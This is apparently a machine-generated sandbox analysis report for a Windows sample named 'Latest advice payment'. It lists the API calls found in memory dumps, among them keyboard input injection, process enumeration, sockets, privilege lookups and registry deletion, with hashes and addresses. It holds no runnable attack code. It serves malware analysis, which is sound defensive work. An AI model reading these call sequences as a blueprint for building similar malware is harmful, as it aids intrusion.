                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __snwprintf_memmove
                                                            • String ID: , $$AUTOITCALLVARIABLE%d$%_
                                                            • API String ID: 3506404897-725856461
                                                            • Opcode ID: 59bc726cba6d23f0e0baf79d4d44eb326b19e08fcd5cf47e366b3dacfb614eda
                                                            • Instruction ID: 58eb8c524b1dae718fc4604b6ede8554a876f6a62ddf52310e5be16541f8c157
                                                            • Opcode Fuzzy Hash: 59bc726cba6d23f0e0baf79d4d44eb326b19e08fcd5cf47e366b3dacfb614eda
                                                            • Instruction Fuzzy Hash: 4B21617170021AAECF10EF68CC86AAE7FB5BF88700F544456F545A7282DB30EA45CB62
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 005E7772
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 005E7787
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 005E7794
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: 6f2d64cf12d55c47d99fc217ec5a6e6b253b60acc57e79c54597ec327726b0b5
                                                            • Instruction ID: 2da34952a5b70678657f68a213ce03cfdf91a57011e6da820bfe48d4285c6b85
                                                            • Opcode Fuzzy Hash: 6f2d64cf12d55c47d99fc217ec5a6e6b253b60acc57e79c54597ec327726b0b5
                                                            • Instruction Fuzzy Hash: 6B113A72244249BFEF245F61CC05FE73B69FF8CB54F010518F68196090C671E851CB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __calloc_crt
                                                            • String ID: a$@Bb
                                                            • API String ID: 3494438863-3557447813
                                                            • Opcode ID: 29253178a87600eed9c3ee5f89498e63b68a56e2995198b18db793d2d6b14609
                                                            • Instruction ID: e62121db8be38f47f789839764bbd38882cf5d6c68f428452520751e81c5ffc9
                                                            • Opcode Fuzzy Hash: 29253178a87600eed9c3ee5f89498e63b68a56e2995198b18db793d2d6b14609
                                                            • Instruction Fuzzy Hash: 48F04F7120AA12CBE774AF68BC52AB22F96F744775F54042AE901EE1D0EB70C98287C4
                                                            APIs
                                                            • __lock.LIBCMT ref: 00589B94
                                                              • Part of subcall function 00589C0B: __mtinitlocknum.LIBCMT ref: 00589C1D
                                                              • Part of subcall function 00589C0B: EnterCriticalSection.KERNEL32(00000000,?,00589A7C,0000000D), ref: 00589C36
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00589BA4
                                                              • Part of subcall function 00589100: ___addlocaleref.LIBCMT ref: 0058911C
                                                              • Part of subcall function 00589100: ___removelocaleref.LIBCMT ref: 00589127
                                                              • Part of subcall function 00589100: ___freetlocinfo.LIBCMT ref: 0058913B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                            • String ID: 8a$8a
                                                            • API String ID: 547918592-4001635133
                                                            • Opcode ID: b42c87632012779dc191ca50036604e3c735f24e1685d8ccdd66b8db7012aa4d
                                                            • Instruction ID: 063ed7b9b9af707b2d44a41b9228f616ce52e6d20a1ab902ed017c07380daf01
                                                            • Opcode Fuzzy Hash: b42c87632012779dc191ca50036604e3c735f24e1685d8ccdd66b8db7012aa4d
                                                            • Instruction Fuzzy Hash: 36E0863154B302A7E710FBE46A0B7A87E51BB80B21F6C515AFC45750C1CD7548408757
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00564BD0,?,00564DEF,?,006252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00564C11
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00564C23
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: 2cee44d266c59f57209944af78bc73c815571c1475cbd8e30fe876a28fb06d53
                                                            • Instruction ID: 19b0c809edc0ab3c6744d46c27349b50c1d759356ae5f3ba4fa5de8fed12e171
                                                            • Opcode Fuzzy Hash: 2cee44d266c59f57209944af78bc73c815571c1475cbd8e30fe876a28fb06d53
                                                            • Instruction Fuzzy Hash: FFD0EC30511712CFD7245B71D948647BAD6AF19351B15883994C6DB250EAB0D880CB50
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00564B83,?), ref: 00564C44
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00564C56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: 7d2f6c105867d0de6aa5e3e6f44aa49c39f763b4abc972a2d73e2a7c42531a4d
                                                            • Instruction ID: 5243d5d1110c56fd6617feab9766ee72803baa4a2b59cc533125f74d4364709a
                                                            • Opcode Fuzzy Hash: 7d2f6c105867d0de6aa5e3e6f44aa49c39f763b4abc972a2d73e2a7c42531a4d
                                                            • Instruction Fuzzy Hash: 2BD01730910B53CFE72C9F32D94864ABBEABF15351B15C83E94D6DA260EA70D890CB60
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,005E1039), ref: 005E0DF5
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 005E0E07
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: 4a8968b782df3ea2230e053419470555ea07d89181888f17a3f53416584ae8e7
                                                            • Instruction ID: e4aecfa9bac315e1cfba7e5a857edbfea180433cad09928aa93e72191ca7f1ac
                                                            • Opcode Fuzzy Hash: 4a8968b782df3ea2230e053419470555ea07d89181888f17a3f53416584ae8e7
                                                            • Instruction Fuzzy Hash: 8CD0C230400716CFC3284FB1C84828276EAAF10341F05CC3D94C2DA190DAB0D4D0C720
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,005D8CF4,?,005EF910), ref: 005D90EE
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 005D9100
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: LocalTime__swprintf
                                                            • String ID: %.3d$WIN_XPe
                                                            • API String ID: 2070861257-2409531811
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 005DE0BE
                                                            • CharLowerBuffW.USER32(?,?), ref: 005DE101
                                                              • Part of subcall function 005DD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 005DD7C5
                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 005DE301
                                                            • _memmove.LIBCMT ref: 005DE314
                                                            Similarity
                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                            • String ID:
                                                            • API String ID: 3659485706-0
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 005D80C3
                                                            • CoUninitialize.OLE32 ref: 005D80CE
                                                              • Part of subcall function 005BD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 005BD5D4
                                                            • VariantInit.OLEAUT32(?), ref: 005D80D9
                                                            • VariantClear.OLEAUT32(?), ref: 005D83AA
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            APIs
                                                            • GetWindowRect.USER32(01080270,?), ref: 005E9863
                                                            • ScreenToClient.USER32(00000002,00000002), ref: 005E9896
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 005E9903
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 005B9AD2
                                                            • __itow.LIBCMT ref: 005B9B03
                                                              • Part of subcall function 005B9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 005B9DBE
                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 005B9B6C
                                                            • __itow.LIBCMT ref: 005B9BC3
                                                            Similarity
                                                            • API ID: MessageSend$__itow
                                                            • String ID:
                                                            • API String ID: 3379773720-0
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 005D69D1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D69E1
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 005D6A45
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D6A51
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            • String ID:
                                                            • API String ID: 2214342067-0
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,005EF910), ref: 005D64A7
                                                            • _strlen.LIBCMT ref: 005D64D9
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 005CB89E
                                                            • GetLastError.KERNEL32(?,00000000), ref: 005CB8C4
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 005CB8E9
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 005CB915
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005E88DE
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 005EAB60
                                                            • GetWindowRect.USER32(?,?), ref: 005EABD6
                                                            • PtInRect.USER32(?,?,005EC014), ref: 005EABE6
                                                            • MessageBeep.USER32(00000000), ref: 005EAC57
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: 948ba94bc477fb3a438d64b17cb4f3d05436ac035b662788561f5f93b05bb3cb
                                                            • Instruction ID: e18fcd32dbf08fd4ae680517a1bfbc9606002d1adc01765775538580324ade75
                                                            • Opcode Fuzzy Hash: 948ba94bc477fb3a438d64b17cb4f3d05436ac035b662788561f5f93b05bb3cb
                                                            • Instruction Fuzzy Hash: 25417E30600599DFCB29DF69D884A697BF6FB89300F2494A9F499DF260D730BC41DB92
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 005C0B27
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 005C0B43
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 005C0BA9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 005C0BFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 1642abaed7a0e1aa6ba82c091cdd78f7daf89c8f0f6a42bb0dc8b71d4ebd931a
                                                            • Instruction ID: bc32b855a4967315b1bbdab412fa14e4d005b94c4f30e7f8b91facc79a2cfe75
                                                            • Opcode Fuzzy Hash: 1642abaed7a0e1aa6ba82c091cdd78f7daf89c8f0f6a42bb0dc8b71d4ebd931a
                                                            • Instruction Fuzzy Hash: 94312430940618EEEF34CAA58C09FFEBFA9BB5532CF04925EE481521D1C3B49D4497A1
                                                            APIs
                                                            • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 005C0C66
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 005C0C82
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 005C0CE1
                                                            • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 005C0D33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 144a4072d6f4923bbd6f3702163ab9b863128c10e99dae8efe0624f5d8186db5
                                                            • Instruction ID: 814f60ff5d35d33dcf259e9ed6903ffb2901b2cda6ecc76057f60877cdb85701
                                                            • Opcode Fuzzy Hash: 144a4072d6f4923bbd6f3702163ab9b863128c10e99dae8efe0624f5d8186db5
                                                            • Instruction Fuzzy Hash: 1A312230940618EEFF348AA58C09FFEBFAABB85320F04672EE491521D1C3799D4597A1
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005961FB
                                                            • __isleadbyte_l.LIBCMT ref: 00596229
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00596257
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0059628D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: 32cadd3ad4220d9ddfdd99292a9febbb86a880565b28c1d25525b29c83255ac0
                                                            • Instruction ID: 6ab572314c8f22431e7d45b304e621d852f8b038e9992605bb1b7ea24d3aa1b5
                                                            • Opcode Fuzzy Hash: 32cadd3ad4220d9ddfdd99292a9febbb86a880565b28c1d25525b29c83255ac0
                                                            • Instruction Fuzzy Hash: 7331E134604246AFDF228F75CC48BBA7FB9FF82310F154429E864971A1DB30E958DB90
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 005E4F02
                                                              • Part of subcall function 005C3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005C365B
                                                              • Part of subcall function 005C3641: GetCurrentThreadId.KERNEL32 ref: 005C3662
                                                              • Part of subcall function 005C3641: AttachThreadInput.USER32(00000000,?,005C5005), ref: 005C3669
                                                            • GetCaretPos.USER32(?), ref: 005E4F13
                                                            • ClientToScreen.USER32(00000000,?), ref: 005E4F4E
                                                            • GetForegroundWindow.USER32 ref: 005E4F54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: ca333164d96a3162a386dba12003b6936c5798e81c0d7dd868b15afc220d1d61
                                                            • Instruction ID: 8233e477a0dc7d956ff690245ae67b4d7c2053847f212395f40c8f8ff5d51016
                                                            • Opcode Fuzzy Hash: ca333164d96a3162a386dba12003b6936c5798e81c0d7dd868b15afc220d1d61
                                                            • Instruction Fuzzy Hash: 99312CB1D00109AFCB14EFA5C8899EFBBFDFF98300B10406AE455E7241DA719E458BA1
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 005C3C7A
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 005C3C88
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 005C3CA8
                                                            • CloseHandle.KERNEL32(00000000), ref: 005C3D52
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 420147892-0
                                                            • Opcode ID: 855611c87451576fcf1d0f4c74d5ce4e8f0cabc6631c44885e7505062692b216
                                                            • Instruction ID: 4b68dcf22f78802b1b692094dad9de508b6ddd87b7e9c1530e19f242c04ddcb2
                                                            • Opcode Fuzzy Hash: 855611c87451576fcf1d0f4c74d5ce4e8f0cabc6631c44885e7505062692b216
                                                            • Instruction Fuzzy Hash: 07315E7110834A9FD314EF54C885EAEBFE8BFD9354F50482DF482871A1EB719A49CB92
                                                            APIs
                                                              • Part of subcall function 00562612: GetWindowLongW.USER32(?,000000EB), ref: 00562623
                                                            • GetCursorPos.USER32(?), ref: 005EC4D2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0059B9AB,?,?,?,?,?), ref: 005EC4E7
                                                            • GetCursorPos.USER32(?), ref: 005EC534
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0059B9AB,?,?,?), ref: 005EC56E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: 02996ba9b08ed47acfec3b1db3375c9cacf16eb5e0ca240c400b80c6033adc7c
                                                            • Instruction ID: 1365ba3784d075ddfd681cb91e0c22e42dd4b1bdec7676aa6212b63104ac6dd5
                                                            • Opcode Fuzzy Hash: 02996ba9b08ed47acfec3b1db3375c9cacf16eb5e0ca240c400b80c6033adc7c
                                                            • Instruction Fuzzy Hash: A9319335500498AFCF298F59C898EBE7FB6FB49310F044066F9858B261CB31AD51DFA4
                                                            APIs
                                                              • Part of subcall function 005B810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005B8121
                                                              • Part of subcall function 005B810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005B812B
                                                              • Part of subcall function 005B810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005B813A
                                                              • Part of subcall function 005B810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005B8141
                                                              • Part of subcall function 005B810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005B8157
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005B86A3
                                                            • _memcmp.LIBCMT ref: 005B86C6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005B86FC
                                                            • HeapFree.KERNEL32(00000000), ref: 005B8703
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
